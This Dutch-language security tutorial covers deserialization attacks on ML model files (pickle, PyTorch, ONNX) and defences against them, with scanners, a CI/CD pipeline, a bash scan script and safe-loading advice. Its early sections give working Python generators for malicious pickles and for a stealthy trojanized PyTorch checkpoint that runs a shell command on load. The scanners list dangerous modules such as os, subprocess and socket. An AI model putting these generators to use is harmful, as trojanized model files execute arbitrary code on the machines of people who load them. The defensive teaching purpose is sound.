Model Serialization Attacks
Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.
Overzicht
Modelserialisatie — het proces van het opslaan van getrainde modelgewichten en -architectuur naar schijf — is een van de gevaarlijkste aanvalsoppervlakken in het ML-ecosysteem. Het dominante serialisatieformaat voor PyTorch-modellen gebruikt de pickle-module van Python, die fundamenteel onveilig is: het laden van een pickle-bestand kan willekeurige Python-code uitvoeren. Dit betekent dat het downloaden en laden van een model uit een niet-vertrouwde bron gelijkstaat aan het downloaden en uitvoeren van een executable uit die bron.
Deze kwetsbaarheid is niet theoretisch. Onderzoekers hebben herhaaldelijk kwaadaardige modelbestanden op de Hugging Face Hub en andere model repositories aangetoond. Het aanvalsoppervlak is breed omdat het laden van modellen zo routinematig is — datawetenschappers en ML-engineers downloaden regelmatig voorgetrainde modellen en gefinetunede checkpoints, vaak met minimale verificatie. De wijdverbreide cultuur van het delen van modellen via platforms zoals Hugging Face heeft een praktijk genormaliseerd die in de traditionele software-engineering als roekeloos zou worden beschouwd.
Dit artikel behandelt de mechanismen van serialisatieaanvallen over verschillende formaten heen (pickle, ONNX, TensorRT), demonstreert hoe je kwaadaardige modelbestanden maakt en detecteert, en biedt veilige laadpraktijken. De aanvallen koppelen aan MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) en worden behandeld door OWASP LLM Top 10 2025 LLM04 (Data and Model Poisoning).
Python Pickle: de fundamentele kwetsbaarheid
Hoe pickle werkt
De pickle-module van Python serialiseert Python-objecten door de instructies vast te leggen die nodig zijn om ze te reconstrueren. Bij het unpicklen worden deze instructies uitgevoerd door een virtuele machine. Het cruciale beveiligingsprobleem is dat de instructieset van pickle de REDUCE-opcode bevat, die een willekeurige callable met willekeurige argumenten aanroept. Dit is by design — pickle moet complexe objecten reconstrueren — maar het betekent dat een geprepareerd pickle-bestand os.system, subprocess.Popen of een andere Python-functie kan aanroepen.
import pickle
import io
import struct
class PickleExploit:
"""
Demonstrate how pickle deserialization enables code execution.
FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
"""
@staticmethod
def create_malicious_pickle(command: str) -> bytes:
"""
Create a pickle payload that executes a shell command on load.
This demonstrates why pickle is fundamentally unsafe for untrusted data.
"""
# The __reduce__ method tells pickle how to reconstruct the object.
# By returning (os.system, (command,)), we instruct the unpickler
# to call os.system(command) when loading.
import os
class Exploit:
def __reduce__(self):
return (os.system, (command,))
return pickle.dumps(Exploit())
@staticmethod
def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
"""
Create a payload that executes code AND returns legitimate-looking data.
This is harder to detect because the model appears to load correctly.
"""
# This payload first executes the command, then returns normal data
class StealthExploit:
def __init__(self, data):
self.data = data
def __reduce__(self):
# Use exec() to run code, then return the legitimate data
return (
eval,
(
f"__import__('os').system('{command}') and None or {repr(self.data)}",
),
)
return pickle.dumps(StealthExploit(legitimate_data))PyTorch-modelbestanden
torch.save() van PyTorch gebruikt standaard pickle. Een kwaadaardig PyTorch-modelbestand (.pt, .pth of .bin) kan willekeurige code uitvoeren wanneer het wordt geladen met torch.load():
import torch
import torch.nn as nn
from typing import Dict, Any
import os
class MaliciousModelDemo:
"""
Demonstrate malicious PyTorch model file creation.
FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
"""
@staticmethod
def create_backdoored_model(
legitimate_model: nn.Module,
payload_command: str,
output_path: str,
) -> None:
"""
Save a model that executes a payload when loaded.
The model functions normally after loading — the payload is stealthy.
"""
class TrojanizedState(dict):
"""A dict subclass that executes code when unpickled."""
def __init__(self, state_dict: dict, command: str):
super().__init__(state_dict)
self._command = command
def __reduce__(self):
# When unpickled:
# 1. Execute the payload
# 2. Return a normal dict (so the model loads correctly)
return (
_reconstruct_with_payload,
(dict(self), self._command),
)
state = TrojanizedState(legitimate_model.state_dict(), payload_command)
torch.save(state, output_path)
def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
"""Helper function used during deserialization."""
os.system(command)
return state_dict
class SafeModelLoader:
"""Load PyTorch models with safety checks."""
@staticmethod
def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
"""
Load a model using weights_only=True (PyTorch 2.0+).
This restricts unpickling to tensor data only.
"""
try:
state_dict = torch.load(
path,
map_location=map_location,
weights_only=True, # Critical security flag
)
return {"success": True, "state_dict": state_dict}
except Exception as e:
return {
"success": False,
"error": str(e),
"detail": "Model file may contain non-tensor data (potential exploit)",
}
@staticmethod
def scan_pickle_for_dangerous_ops(file_path: str) -> list:
"""
Scan a pickle file for potentially dangerous operations
WITHOUT executing them.
"""
import pickletools
findings = []
dangerous_modules = {
"os", "subprocess", "sys", "shutil", "builtins",
"importlib", "ctypes", "socket", "http", "urllib",
"requests", "pathlib", "tempfile", "webbrowser",
}
dangerous_functions = {
"system", "popen", "exec", "eval", "execfile",
"compile", "__import__", "getattr", "setattr",
"globals", "locals", "open", "input",
}
try:
with open(file_path, "rb") as f:
data = f.read()
# Use pickletools to disassemble without executing
ops = []
for opcode, arg, pos in pickletools.genops(data):
ops.append((opcode.name, arg, pos))
if opcode.name in ("GLOBAL", "INST", "STACK_GLOBAL"):
if arg and isinstance(arg, str):
module = arg.split(".")[0] if "." in arg else arg.split("\n")[0]
func = arg.split(".")[-1] if "." in arg else arg.split("\n")[-1] if "\n" in arg else ""
if module in dangerous_modules or func in dangerous_functions:
findings.append({
"severity": "critical",
"position": pos,
"opcode": opcode.name,
"reference": arg,
"finding": f"Dangerous reference: {arg}",
})
elif opcode.name == "REDUCE":
findings.append({
"severity": "medium",
"position": pos,
"opcode": "REDUCE",
"finding": "REDUCE opcode found — triggers function call during unpickling",
})
except Exception as e:
findings.append({
"severity": "error",
"finding": f"Failed to analyze pickle file: {e}",
})
return findingsSafeTensors: het veilige alternatief
SafeTensors is een serialisatieformaat ontwikkeld door Hugging Face specifiek om de beveiligingsproblemen van pickle aan te pakken. Het slaat alleen tensordata op — vormen, dtypes en ruwe numerieke data — zonder enig mechanisme om uitvoerbare code in te bedden.
SafeTensors-architectuur
Het formaat is eenvoudig:
- Een 8-byte headergrootte (little-endian uint64)
- Een JSON-header die tensornamen, vormen, dtypes en byte-offsets beschrijft
- Ruwe tensordata in aaneengesloten byte-arrays
Er is geen code, geen objectreconstructie, geen aanroep van callables — alleen data.
from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
class SafeTensorsManager:
"""Manage model weights using the SafeTensors format."""
@staticmethod
def convert_pytorch_to_safetensors(
pytorch_path: str,
safetensors_path: str,
) -> Dict:
"""Convert a PyTorch model file to SafeTensors format."""
# Load with weights_only=True for safety during conversion
state_dict = torch.load(
pytorch_path, map_location="cpu", weights_only=True
)
# Ensure all values are tensors
tensor_dict = {}
for key, value in state_dict.items():
if isinstance(value, torch.Tensor):
tensor_dict[key] = value
else:
print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
save_file(tensor_dict, safetensors_path)
return {
"input": pytorch_path,
"output": safetensors_path,
"tensors_saved": len(tensor_dict),
"tensors_skipped": len(state_dict) - len(tensor_dict),
}
@staticmethod
def verify_safetensors_integrity(file_path: str) -> Dict:
"""Verify a SafeTensors file's integrity and inspect its contents."""
path = Path(file_path)
result = {
"file": file_path,
"size_bytes": path.stat().st_size,
"format_valid": False,
"tensors": [],
}
try:
with safe_open(file_path, framework="pt", device="cpu") as f:
keys = f.keys()
for key in keys:
tensor = f.get_tensor(key)
result["tensors"].append({
"name": key,
"shape": list(tensor.shape),
"dtype": str(tensor.dtype),
})
result["format_valid"] = True
result["tensor_count"] = len(keys)
except Exception as e:
result["error"] = str(e)
return resultBeperkingen van SafeTensors
SafeTensors is geen volledig modelformaat — het slaat alleen tensoren op, niet de modelarchitectuur, optimizer-state of trainingsconfiguratie. Dit betekent:
- De modelarchitectuur moet in code worden gedefinieerd en het SafeTensors-bestand levert alleen de gewichten
- Custom objecten (learning-rate-schema's, custom layers) kunnen niet worden geserialiseerd
- Sommige Hugging Face-modellen leveren nog steeds pickle-bestanden naast SafeTensors voor achterwaartse compatibiliteit
ONNX-beveiligingsoverwegingen
ONNX (Open Neural Network Exchange) is een open formaat voor ML-modellen dat Protocol Buffers-serialisatie gebruikt. Het is veiliger dan pickle omdat het een gedefinieerd schema gebruikt in plaats van willekeurige code-execution. ONNX heeft echter zijn eigen beveiligingszorgen:
Custom operators
ONNX ondersteunt custom operators die gedeelde libraries kunnen laden en uitvoeren:
from typing import Dict, List
from pathlib import Path
class ONNXSecurityScanner:
"""Scan ONNX models for security issues."""
def scan_model(self, model_path: str) -> List[Dict]:
"""Scan an ONNX model for security concerns."""
import onnx
findings = []
model = onnx.load(model_path)
# Check for custom operators (could load arbitrary shared libraries)
for node in model.graph.node:
if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
findings.append({
"severity": "high",
"finding": f"Custom operator domain: {node.domain}",
"operator": node.op_type,
"detail": "Custom operators may load arbitrary native code",
})
# Check for external data references
for initializer in model.graph.initializer:
if initializer.data_location == 1: # External data
external_path = ""
for entry in initializer.external_data:
if entry.key == "location":
external_path = entry.value
findings.append({
"severity": "medium",
"finding": f"External data reference: {external_path}",
"detail": "External data could point to a malicious file path",
})
# Check model metadata for suspicious content
for prop in model.metadata_props:
if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
findings.append({
"severity": "medium",
"finding": f"Suspicious metadata: {prop.key}",
"value_preview": prop.value[:100],
})
# Check model size vs parameter count (anomalously large models may contain embedded data)
file_size = Path(model_path).stat().st_size
param_count = sum(
1
for _ in model.graph.initializer
)
if param_count > 0:
bytes_per_param = file_size / param_count
if bytes_per_param > 1000: # Unusually large
findings.append({
"severity": "low",
"finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
"detail": "Model file may contain embedded non-model data",
})
return findingsPipeline voor het scannen van modelbestanden
Geautomatiseerd scannen in CI/CD
Integreer het scannen van modelbestanden in de CI/CD van je ML-pipeline:
import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
class ModelFileScanner:
"""Comprehensive model file security scanner for CI/CD pipelines."""
SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
def __init__(self, policy: str = "strict"):
"""
Args:
policy: 'strict' blocks all unsafe formats,
'warn' logs warnings but allows loading
"""
self.policy = policy
def scan_directory(self, directory: str) -> Dict:
"""Scan a directory of model files for security issues."""
path = Path(directory)
results = {
"scan_time": datetime.now(timezone.utc).isoformat(),
"directory": directory,
"policy": self.policy,
"files_scanned": 0,
"findings": [],
"blocked": [],
"safe_files": [],
}
for file_path in path.rglob("*"):
if not file_path.is_file():
continue
results["files_scanned"] += 1
suffix = file_path.suffix.lower()
if suffix in self.UNSAFE_FORMATS:
finding = {
"file": str(file_path),
"format": suffix,
"severity": "high",
"finding": f"Unsafe serialization format: {suffix}",
}
# Deep scan pickle-based files
if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
try:
pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
str(file_path)
)
if pickle_findings:
finding["pickle_analysis"] = pickle_findings
finding["severity"] = "critical"
except Exception as e:
finding["scan_error"] = str(e)
results["findings"].append(finding)
if self.policy == "strict":
results["blocked"].append(str(file_path))
elif suffix in self.SAFE_FORMATS:
results["safe_files"].append(str(file_path))
results["pass"] = len(results["blocked"]) == 0
return results
def generate_manifest(self, directory: str) -> Dict[str, str]:
"""Generate a hash manifest for all model files in a directory."""
path = Path(directory)
manifest = {}
for file_path in sorted(path.rglob("*")):
if file_path.is_file():
sha256 = hashlib.sha256()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
relative = str(file_path.relative_to(path))
manifest[relative] = sha256.hexdigest()
return manifestScannen met bestaande tools
Verschillende tools kunnen modelbestanden scannen op kwaadaardige inhoud:
#!/bin/bash
# Model file security scanning pipeline
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
echo "Usage: $0 <model_directory>"
exit 1
fi
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while read f; do
echo " CRITICAL: Pickle file found: $f"
done
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while read f; do
echo " WARNING: PyTorch file (may use pickle): $f"
done
find "$MODEL_DIR" -type f -name "*.safetensors" | while read f; do
echo " OK: SafeTensors file: $f"
done
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while read f; do
echo " Analyzing: $f"
fickling --check-safety "$f" 2>/dev/null || echo " Could not analyze $f"
done
else
echo " fickling not installed. Install with: pip install fickling"
fi
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
modelscan scan -p "$MODEL_DIR"
else
echo " modelscan not installed. Install with: pip install modelscan"
fi
echo ""
echo "=== Scan Complete ==="De hierboven genoemde tools zijn echt:
- fickling (Trail of Bits): Statische analyse van pickle-bestanden zonder ze uit te voeren. https://github.com/trailofbits/fickling
- modelscan (Protect AI): Scant modelbestanden op onveilige operaties over verschillende formaten heen. https://github.com/protectai/modelscan
Formaatvergelijking
| Formaat | Risico op code-execution | Ecosysteemondersteuning | Prestaties | Aanbevolen |
|---|---|---|---|---|
| Pickle (.pkl) | Kritiek — willekeurige code-execution | Universeel Python | Snel | Nooit voor niet-vertrouwde bronnen |
| PyTorch (.pt/.pth) | Hoog — gebruikt intern pickle | PyTorch-ecosysteem | Snel | Gebruik weights_only=True |
| SafeTensors | Geen — alleen data | Hugging Face, groeiend | Snel | Ja — voorkeursformaat |
| ONNX (.onnx) | Laag — custom ops kunnen code laden | Cross-framework | Goed | Ja, met review van custom ops |
| TensorRT (.plan) | Laag — engine-formaat | NVIDIA-inferentie | Snelst | Ja, voor NVIDIA-deployment |
| TFLite (.tflite) | Laag — flatbuffers-formaat | Mobiel/edge | Goed | Ja, voor edge-deployment |
Verdedigingsaanbevelingen
- Gebruik SafeTensors als standaard serialisatieformaat voor alle nieuwe modellen
- Gebruik altijd
weights_only=Truebij het laden van PyTorch-modellen mettorch.load() - Scan alle modelbestanden in CI/CD-pipelines vóór deployment met fickling of modelscan
- Laad nooit pickle-bestanden uit niet-vertrouwde bronnen — behandel ze als executables
- Converteer bestaande pickle-modellen naar SafeTensors-formaat en stoot de pickle-versies af
- Verifieer hashes van modelbestanden tegen een vertrouwd manifest vóór het laden
- Beperk modeldownloadbronnen tot goedgekeurde registries met geverifieerde publishers
- Monitor Hugging Face-modellen op wijzigingen na het uploaden (gebruik commit-hashes, geen branch-refs)
References
- Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
- Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
- Hugging Face SafeTensors — https://github.com/huggingface/safetensors
- MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
- OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
- Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
- PyTorch
weights_onlydocumentation — https://pytorch.org/docs/stable/generated/torch.load.html